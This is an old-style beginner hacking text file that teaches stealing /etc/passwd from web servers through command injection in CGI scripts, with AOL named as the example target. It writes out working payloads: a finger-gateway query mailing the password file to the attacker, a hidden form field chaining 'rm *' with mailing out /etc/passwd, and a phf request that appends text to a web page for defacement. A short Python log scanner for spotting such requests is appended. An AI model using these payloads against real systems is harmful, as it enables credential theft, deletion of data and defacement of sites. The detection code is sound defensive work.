Browser Hack
I - Introduction
This file describes several techniques to acquire a password file using nothing but an ordinary web browser. The information is pitched at the beginner hacker, but all hackers should benefit from it.
II - Hacking from your Web Browser
There are several techniques in what I call "Web Browser Hacking". Many beginners don't know that you can query an etc/passwd file from your browser, and I will describe all the ways to acquire a passwd file. First you need to find a box that is running the cgi-bin/phf file on its system. A great way to find out without trial and error is to go to www.altavista.com and search on cgi-bin and perl.exe, or cgi-bin and phf.
a - Finger box hacking:
Let's say you wanted to break into somewhere like AOL. The first thing we would do is type in their web site in the URL: http://www.aol.com. The next thing we would do is add /cgi-bin/finger to the web URL, so it would look like this: http://www.aol.com/cgi-bin/finger. If the finger gateway is operational, a box should appear for you to enter the name you want to finger, and you have a chance to receive the etc/passwd file. The next thing you will probably want to do is search for a mailto on the web page; just scan the page for any mailto refs. Go back to the finger box and type in this query: nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd. This string takes nobody and emails the passwd file to your email address. If this works, you now have the etc/passwd file in your mailbox; you can now run a crack program against it and have a little fun on their box.
b - The common cgi-bin/phf query:
c - Don't take my cgi form:
<html><body>
<h2>This is a form to go to Modify</h2>
<form action="http://www.aol.com/cgi-bin/doc.pl" method="get">
<input type="hidden" name="myaddress" value="nobody@aol.com">
<input type="text" name="input">
<input type="submit" value="send">
</form>
</body></html>
This is a simple form that asks a user to input a message to be sent to a script called doc.pl. Included in the doc.pl script is the following line, which assumes the input has already been parsed out:
system("/usr/lib/sendmail -t $myaddress < $tempfile")
Now let's set up your page:
<html><body>
<h2>Hack AOL</h2>
<form action="http://www.aol.com/cgi-bin/doc.pl" method="get">
<input type="hidden" name="myaddress" value=" ; rm * ;mail -s file youraddress@yourisp.com </etc/passwd;">
<input type="text" name="input">
<input type="submit" value="getpasswd">
</form>
</body></html>
The semicolons in the hidden value field act as delimiters: they separate the UNIX commands so that several execute on the same line. The system call in Perl creates a UNIX shell, which here mails the passwd file to you.
d - Changing web pages from your browser:
This short section describes the string to use to edit a web page from your web browser. Same scenario as the first section: http://www.aol.com. We then add the following string: cgi-bin/phf?Qalias=x%0a/bin/echo%20 "some text and shit"%20>>filename.html. This string will allow you to write to filename.html and add "some text and shit". Note that it has to be in HTML format; you can place text, pictures or whatever you like.
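The requests in sections c and d leave a recognisable trace in the web server's access log: a cgi-bin parameter whose decoded value contains shell metacharacters (; < > or the %0a newline). The following is an added example, not part of the original text, that flags such requests; the log lines, hosts and addresses are constructed, and the function names are assumptions of the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Characters that let a parameter value escape a shell command line:
# separators (; & newline), pipes, redirection, and substitution.
SHELL_META = re.compile(r"[;&|<>`$\n\r]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access log (common log format); hosts and IPs are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/doc.pl?myaddress=nobody%40example.org&input=hello+there HTTP/1.0" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:02:11 +0000] "GET /cgi-bin/doc.pl?myaddress=%3B+mail+a%40example.org+%3C%2Fetc%2Fpasswd%3B&input=x HTTP/1.0" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:03:40 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/echo%20test HTTP/1.0" 200 90',
    '192.0.2.10 - - [01/Jan/2024:10:05:00 +0000] "GET /index.html?q=a%3Bb HTTP/1.0" 200 2048',
]

def suspicious_params(log_line):
    """Return [(param, decoded_value)] for CGI parameters containing shell metacharacters."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if "/cgi-bin/" not in url.path:      # only requests that reach CGI scripts
        return []
    # parse_qsl percent-decodes, so %3B and %0a are matched as ';' and newline
    return [(name, value)
            for name, value in parse_qsl(url.query, keep_blank_values=True)
            if SHELL_META.search(value)]

def scan(lines):
    """Return [(line_number, param, value)] for every flagged parameter."""
    return [(n, name, value)
            for n, line in enumerate(lines, 1)
            for name, value in suspicious_params(line)]

if __name__ == "__main__":
    for n, name, value in scan(SAMPLE_LOG):
        print(f"line {n}: {name}={value!r}")
```

Access logs only show GET query strings, so a form submitted with POST needs the same check applied where the request body is visible. Flagging is detection only; the flaw itself is the script handing the parameter to a shell, as in the system() line in section c.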
Email: hackerblackbox@gmail.com